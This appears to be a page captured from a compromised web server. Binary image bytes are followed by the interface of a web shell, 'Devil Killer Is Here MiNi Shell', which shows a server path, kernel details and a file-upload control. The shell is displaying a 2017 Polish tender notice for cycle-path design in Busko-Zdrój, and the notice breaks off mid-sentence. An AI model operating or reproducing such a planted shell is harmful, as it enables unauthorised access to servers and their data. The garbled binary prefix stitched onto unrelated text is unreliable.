JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170710/547728-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 547728-N-2017 z dnia 2017-07-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Burmistrz Miasta i Gminy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Opracowanie dokumentacji projektowej budowy spójnego systemu ścieżek rowerowych/ciągów pieszo-rowerowych na terenie Miasta Busko-Zdrój etap I w ramach zadania pn. ,,Poprawa jakości powietrza w uzdrowisku Busko-Zdrój poprzez działania w obszarze ekologicznego transportu i infrastruktury oświetleniowej"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Burmistrz Miasta i Gminy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">52369500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Adama Mickiewicza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">10</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">28100 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Busko-Zdrój</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">świętokrzyskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">413 705 200, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">urzad@umig.busko.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">413 705 290</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.umig.busko.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.umig.busko.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.umig.busko.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków określonych w ustawie, prowadzi się z zachowaniem formy pisemnej. </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko-Zdrój, pok. Nr 3 (Biuro Obsługi Interesanta)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Opracowanie dokumentacji projektowej budowy spójnego systemu ścieżek rowerowych/ciągów pieszo-rowerowych na terenie Miasta Busko-Zdrój etap I w ramach zadania pn. ,,Poprawa jakości powietrza w uzdrowisku Busko-Zdrój poprzez działania w obszarze ekologicznego transportu i infrastruktury oświetleniowej"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RSID.271.28.2017.ZP</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">I.1. Przedmiotem zamówienia 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej budowy spójnego systemu ścieżek rowerowych/ciągów pieszo-rowerowych na terenie Miasta Busko-Zdrój etap I w ramach zadania pn. ,,Poprawa jakości powietrza w uzdrowisku Busko-Zdrój poprzez działania w obszarze ekologicznego transportu i infrastruktury oświetleniowej".2.	Wykonawca, opracowujący dokumentację projektową stanowiącą przedmiot niniejszego postępowania, musi oprzeć się na wszystkich obowiązujących przepisach dotyczących budowy dróg publicznych i dróg rowerowych określających standardy tych dróg.3.	Zamówienie obejmuje opracowanie dokumentacji projektowej budowlano-wykonawczej z podziałem na następujące zadania inwestycyjne:a)	Zadanie Nr 1: budowa ścieżki rowerowej/ciągu pieszo-rowerowego w ulicy Starkiewicza, 1-ego Maja, Rehabilitacyjnej w Busku-Zdroju i w ul. Strażackiej w Zbludowicach. Szacowana długość ścieżek do zaprojektowania wynosi 2,5 km w tym łączna długość odcinków ścieżki, na które ma zostać opracowana dokumentacja projektowa celem uzyskania decyzji:- o zezwoleniu na realizację inwestycji drogowej wynosi ok. 0,6 km ,- o pozwoleniu na budowę/zgłoszeniu robót budowlanych wynosi ok. 1,9 km. Powyższe dane mają charakter orientacyjny i podczas prac projektowych mogą ulec zmianie.b)	Zadanie Nr 2: budowa ścieżki rowerowej/ciągu pieszo-rowerowego w ulicach: Rokosza, przedłużenie ulicy Rokosza, Waryńskiego ( na odcinku od ulicy Młyńskiej do DW 973 oraz na odcinku od ul. Lipowej do ul. Mickiewicza), Kusocińskiego i Lipowej w Busku-Zdroju. Szacowana długość ścieżek do zaprojektowania wynosi 3,6 km w tym łączna długość odcinków ścieżki, na które ma zostać opracowana dokumentacja projektowa celem uzyskania decyzji:- o zezwoleniu na realizację inwestycji drogowej wynosi ok. 1,2 km ,- o pozwoleniu na budowę/zgłoszeniu robót budowlanych wynosi ok. 2,4 km. Powyższe dane mają charakter orientacyjny i podczas prac projektowych mogą ulec zmianie. 4.	Zakres przedmiotu zamówienia:1)	opracowanie projektów budowlano-wykonawczych wielobranżowych oddzielnie dla poszczególnych odcinków ulic po 5 egz. w wersji papierowej i 1 egz. w wersji elektronicznej w formacie ogólnodostępnym pdf i dwg, z uwzględnieniem wymogów stawianych przez organy właściwe do wydania stosownych decyzji administracyjnych, zgodnie z: a) Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 27 kwietnia 2012r. poz. 462),	b) Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych (Dz. U. z dnia 27 kwietnia 2004r. poz. 463),	c) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 ze zm.);d) Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 2016 r. poz. 124);e) Ustawą z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t.j. Dz. U z 2013r. poz. 687; zm.: Dz. U z 2014r. poz. 40 oraz z 2015r. poz. 1211). 2) opracowanie przedmiarów robót dla projektów budowlano-wykonawczych wielobranżowych poszczególnych odcinków ulic po 1 egz. w wersji papierowej i 1 egz. w wersji elektronicznej w formacie ogólnodostępnym pdf lub arkuszu kalkulacyjnym,3) opracowanie kosztorysów inwestorskich dla projektów budowlano-wykonawczych wielobranżowych poszczególnych odcinków ulic zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389 ze zm.) - po 1 egz. w wersji papierowej i 1 egz. w wersji elektronicznej w formacie ogólnodostępnym pdf, lub arkuszu kalkulacyjnym. 4) opracowanie operatów wodno- prawnych wielobranżowych i uzyskanie pozwoleńwodno-prawnych, lub dokonanie stosownych zgłoszeń.5)	opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych w 1 egz. w wersji papierowej i 1 egz. w wersji elektronicznej w formacie ogólnodostępnym pdf,6)	uzyskanie na swój koszt decyzji środowiskowej, jeżeli jest wymagana wraz z opracowaniem kompletnego wniosku wraz z załącznikami, oraz raportu oddziaływania przedsięwzięcia na środowisko, 7)	uzyskanie na swój koszt decyzji o Lokalizacji Inwestycji Celu Publicznego w przypadku konieczności uzyskania takiej decyzji dla poszczególnych odcinków ulic,8)	uzyskanie na swój koszt wszelkich niezbędnych decyzji administracyjnych, opinii, uzgodnień, sprawdzeń, opracowań, zatwierdzeń i pozwoleń umożliwiających kompleksową realizację inwestycji oraz uzyskanie decyzji ZRID i pozwolenia na budowę,9)	opracowanie projektów podziału działek (około 100 działek) zgodnie z Ustawą z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t.j. Dz. U z 2013r. poz. 687; zm.: Dz. U z 2014r. poz. 40 oraz z 2015r. poz. 1211),10)	opracowanie projektów docelowej organizacji ruchu z zatwierdzeniami oraz docelowej organizacji ruchu z zatwierdzeniami - po 3 egz. w wersji papierowej i 1 egz. w wersji elektronicznej w formancie ogólnodostępnym pdf, zgodnie z obowiązującymi w tym zakresie przepisami prawa,11)	opracowanie map do celów projektowych, oraz ich aktualizacja na dzień składania wniosku o pozwolenie na realizację inwestycji drogowej i pozwolenia na budowę, podział działek, operaty, uzgodnienia itp. Zamawiający informuje, że mapy do celów projektowych na terenie powiatu Busko-Zdrój mają klauzulę ważności na okres 6 miesięcy od daty przyjęcia ich do zasobów geodezyjnych Starostwa Powiatowego w Busku-Zdroju,12)	opracowanie dokumentacji geologiczno-inżynierskiej w zakresie niezbędnym do wykonania inwestycji,13)	uzgodnienie z Zamawiającym rozwiązań materiałowych, konstrukcyjnych i technologicznych dla zastosowanych rozwiązań projektowych,14)	udział w ramach wynagrodzenia, w spotkaniach roboczych oraz konsultacjach z Zamawiającym (w siedzibie Zamawiającego) w trakcie realizacji niniejszego zamówienia.5.	Zakres opracowania projektu budowlano-wykonawczego wielobranżowego musi obejmować:a)	Projekt budowlano-wykonawczy branży drogowej,b)	Projekt budowlano-wykonawczy branży sanitarnej dotyczący sieci kanalizacji deszczowej, drenażu drogowego, wraz przyłączami kanalizacji deszczowej zakończonymi wpustami ulicznymi oraz urządzeniami podczyszczającymi w postaci zintegrowanych separatorów ropopochodnych,c)	Projekt budowlano-wykonawczy branży sanitarnej dotyczący usunięcia kolizji z infrastrukturą podziemną tj. sieciami kanalizacji sanitarnej i uzdrowiskowej (pokąpielowa), sieciami wodociągowymi i sieciami gazowymi,d)	Projekt budowlano-wykonawczy branży elektrycznej dotyczący budowy i przebudowy linii kablowej oświetlenia ulicznego oraz przebudowy kolidujących napowietrznych i kablowych linii energetycznych będących w zarządzie PGE Rejon Energetyczny Busko.e) Projekt budowlano-wykonawczy branży telekomunikacyjnej dotyczący przebudowy kolidujących napowietrznych i kablowych linii telekomunikacyjnych i światłowodowych,f)	uzyskanie wszelkich uzgodnień i warunków technicznych dot. m.in. infrastruktury podziemnej i naziemnej.6. Wstępne warunki do opracowania dokumentacji projektowej budowlano-wykonawczej:1) konstrukcja ścieżki rowerowej - preferowana nawierzchnia kostka brukowa bezfazowa lub beton asfaltowy AC8S,2) odprowadzenie wód opadowych z powierzchni pasa drogowego poprzez zaprojektowanie sieci kanalizacji deszczowej i drenażu drogowego, wraz przyłączami kanalizacji deszczowej zakończonymi wpustami ulicznymi oraz urządzeniami podczyszczającymi w postaci zintegrowanych separatorów ropopochodnych,3) oświetlenie ciągów rowerowych i pieszo-rowerowych poprzez zaprojektowanie linii kablowej oświetlenia ulicznego wraz z poprawą oświetlenia na skrzyżowaniach z drogami publicznymi,4) zaprojektowanie przebudowy istniejących skrzyżowań z drogami (ulicami) publicznymi i wewnętrznymi z uwzględnieniem bezkolizyjnego ruchu pojazdów, pieszych oraz rowerzystów, zastosowania bezpiecznych przejść dla pieszych (typu azyl) oraz śluz rowerowych, pasów dla rowerów itp., w tym przede wszystkim dostosowania do parametrów technicznych wynikających z rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie,5) zaprojektowanie zadaszonych stacji rowerowych i parkingów wyposażonych w stojaki i wieszaki dla rowerów oraz zadaszone boksy do przechowywania rowerów.6) Zamawiający wymaga, aby rozwiązania projektowe uwzględniały oraz zapewniały:a) wszystkie niezbędne przebudowy istniejących skrzyżowań z drogami publicznymi i wewnętrznymi, zjazdów indywidualnych oraz publicznych, dojść pieszych w tym wejść na posesje, działki lub do budynków przyległych do projektowanej ścieżkib) wszystkie niezbędne przebudowy lub budowy drogowych obiektów inżynierskich tj. przepustów, kładek, mostów itp. w tym również obiektów inżynierii wodnej jak rowy otwarte oraz odcinki rowów krytych, wylotów kanalizacyjnych oraz kanałów.c) szerokość wydzielonej ścieżki rowerowej powinna wynosić 2,0-2,5 m, natomiast w przypadku ciągu pieszo-rowerowego szerokość powinna wynosić 3,5-4,0 m, dopuszcza się odstępstwa, jednak na każde takie odstępstwo Zamawiający musi udzielić zgody,d) regulację wysokościową oraz ewentualną przebudowę lub wymianę włazów kanalizacyjnych, zasuw, hydrantów lub innych elementów uzbrojenia podziemnego i nadziemnego zlokalizowanych na trasie ścieżki rowerowej,e) zastosowanie elementów bezpieczeństwa ruchu drogowego jak bariery, poręcze itp. w miejscach szczególnie niebezpiecznych,f) usunięcie kolizji z ewentualną przebudową sieci (podziemnej i napowietrznej) i innych elementów infrastruktury znajdującej się w obrębie opracowania, g) w przypadku wystąpienia kolizji projektowanego układu drogowego z istniejącymi sieciami podziemnymi i naziemnymi oraz innymi obiektami do obowiązków Wykonawcy niniejszego zamówienia należy opracowanie projektu zabezpieczenia danej sieci, obiektu lub usunięcia kolizji.h) Przy projektowaniu i ustalaniu zakresu kolizji uwzględnić należy przepisy ustaw z dnia 21 marca 1985 r. o drogach publicznych (tj. Dz.U. z 2015 r. poz. 460 z późn. zm.), w szczególności przepisy art. 32, 38 i 39 tej Ustawy. W związku z powyższym na etapie uzgodnień należy informować gestorów sieci, iż ich wymagania będą uwzględniane zgodnie z wyżej cytowanymi zapisami ustawowymi. Ponadto Wykonawcę niniejszego zamówienia zobowiązuje się do informowania Zamawiającego o warunkach stawianych przez gestorów sieci. Wymagania gestorów sieci wykraczające poza zakres wynikający z kolizji danej sieci z projektowanym układem drogowym, muszą być uzgodnione z Zamawiającym przed przystąpieniem do prac projektowych.i) inwentaryzację zieleni kolidującej z projektowanym przebiegiem ścieżki rowerowej.7.	Wykonawca zobowiązany będzie do dołączenia do 